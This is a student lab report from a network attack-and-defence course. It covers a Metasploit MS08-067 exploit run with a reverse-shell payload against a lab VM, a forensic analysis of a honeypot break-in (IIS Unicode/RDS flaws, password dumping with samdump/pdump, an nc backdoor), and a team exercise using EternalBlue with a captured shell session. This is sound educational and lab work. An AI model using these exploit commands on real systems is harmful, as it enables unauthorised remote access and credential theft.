20232937文兆宇 2023-2024-2 《网络攻防实践》实践六报告-编程知识

20232937文兆宇 2023-2024-2 《网络攻防实践》实践六报告

1.实践内容

（1）动手实践Metasploit windows attacker

任务：使用metasploit软件进行windows远程渗透统计实验

具体任务内容：使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击，获取目标主机的访问权

（2）取证分析实践：解码一次成功的NT系统破解攻击。

来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net)，要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击
攻击者如何使用这个破解工具进入并控制了系统
攻击者获得系统访问权限后做了什么
我们如何防止这样的攻击
你觉得攻击者是否警觉了他的目标是一台蜜罐主机？如果是，为什么
（3）团队对抗实践：windows系统远程渗透攻击和分析。

攻方使用metasploit选择漏洞进行攻击，获得控制权。（要求写出攻击方的同学信息、使用漏洞、相关IP地址等）

防守方使用wireshark监听获得的网络数据包，分析攻击过程，获取相关信息。

2.实践过程

2.1动手实践Metasploit windows attacker

攻击机：winxpattacker(192.168.200.4)
靶机：win2server(192.168.200.14)
在攻击机里，开始-所有程序-渗透工具-metasploit3-cygwin shell
在这里插入图片描述输入命令msfconsole
接下来利用MS08-067漏洞

search ms08_067 
use windows/smb/ms08_067_netapi

在这里插入图片描述配置漏洞的参数

set payload generic/shell_reverse_tcp
set LHOST 192.168.200.4
set RHOST 192.168.200.14
show options

在这里插入图片描述
最后输入命令，攻击利用

exploit

在这里插入图片描述最后攻击成功

2.2取证分析实践：解码一次成功的NT系统破解攻击

先用wireshark打开流量文件
在这里插入图片描述已知目标主机的ip，发现关于目标主机有大量的http流，进行追踪

ip.dst ==172.16.1.106 and http

在这里插入图片描述在tcp流里发现了unicode字符串，猜测是Unicode攻击以打开boot.ini文件

继续往下寻找，发现了shell语句，查找资料后发现这是rds漏洞

根据shell语句以及视频资料
攻击者使用IIS Unicode漏洞进行攻击，利用msadcs.dll中的RDS漏洞允许任意代码执行的漏洞进行攻击
攻击者利用FTP的方式下载文件，dump.exe和samdump.dll是配合使用破解口令的，利用samdump.dll拿到口令后再用pdump.exe进行破解
nc.exe是一个后门
在这里插入图片描述
输入命令过滤流量文件

http.request.uri contains "msadc"

这里发现msadcs.dll已经上传成功了
在这里插入图片描述追踪ftp流，这里可以看见用户名和密码以及后续的后门操作
继续查看1233流量包，发现攻击者攻击了6969端口
在5766包里面，删除痕迹。
在下面的图里，攻击者已经发现了这是一个蜜罐
对于如何防止攻击，可以先修补RDS和Unicode漏洞，或者直接升级相应的服务到最新版本即可。

2.3团队对抗实践：windows系统远程渗透攻击和分析

攻击

攻击方：文兆宇 kali 192.168.43.68
防守方：WHY win2server 192.168.43.158
利用MS08-067漏洞
在这里插入图片描述

防守

攻击方：WHY kali 192.168.43.16
防守方：文兆宇 win2server 192.168.43.218
利用永恒之蓝漏洞
攻击方扫描
在这里插入图片描述流量包

Microsoft Windows 2000 [Version 5.00.2195]echo pre2n9i8tqY9J65h(C) ........ 1985-1998 Microsoft Corp.C:\WINNT\system32>echo pre2n9i8tqY9J65h
pre2n9i8tqY9J65hC:\WINNT\system32>C:\WINNT\system32>ipconfig/all
ipconfig/allWindows 2000 IP ConfigurationHost Name . . . . . . . . . . . . : icst-win2k-sPrimary DNS Suffix  . . . . . . . : Node Type . . . . . . . . . . . . : HybridIP Routing Enabled. . . . . . . . : NoWINS Proxy Enabled. . . . . . . . : NoEthernet adapter ........:Connection-specific DNS Suffix  . : Description . . . . . . . . . . . : VMware Accelerated AMD PCNet AdapterPhysical Address. . . . . . . . . : 00-0C-29-50-6C-57DHCP Enabled. . . . . . . . . . . : YesAutoconfiguration Enabled . . . . : YesIP Address. . . . . . . . . . . . : 192.168.43.218Subnet Mask . . . . . . . . . . . : 255.255.255.0Default Gateway . . . . . . . . . : 192.168.43.1DHCP Server . . . . . . . . . . . : 192.168.43.1DNS Servers . . . . . . . . . . . : 192.168.43.1Lease Obtained. . . . . . . . . . : 2024..4..18.. 21:11:36Lease Expires . . . . . . . . . . : 2024..4..18.. 22:11:36C:\WINNT\system32>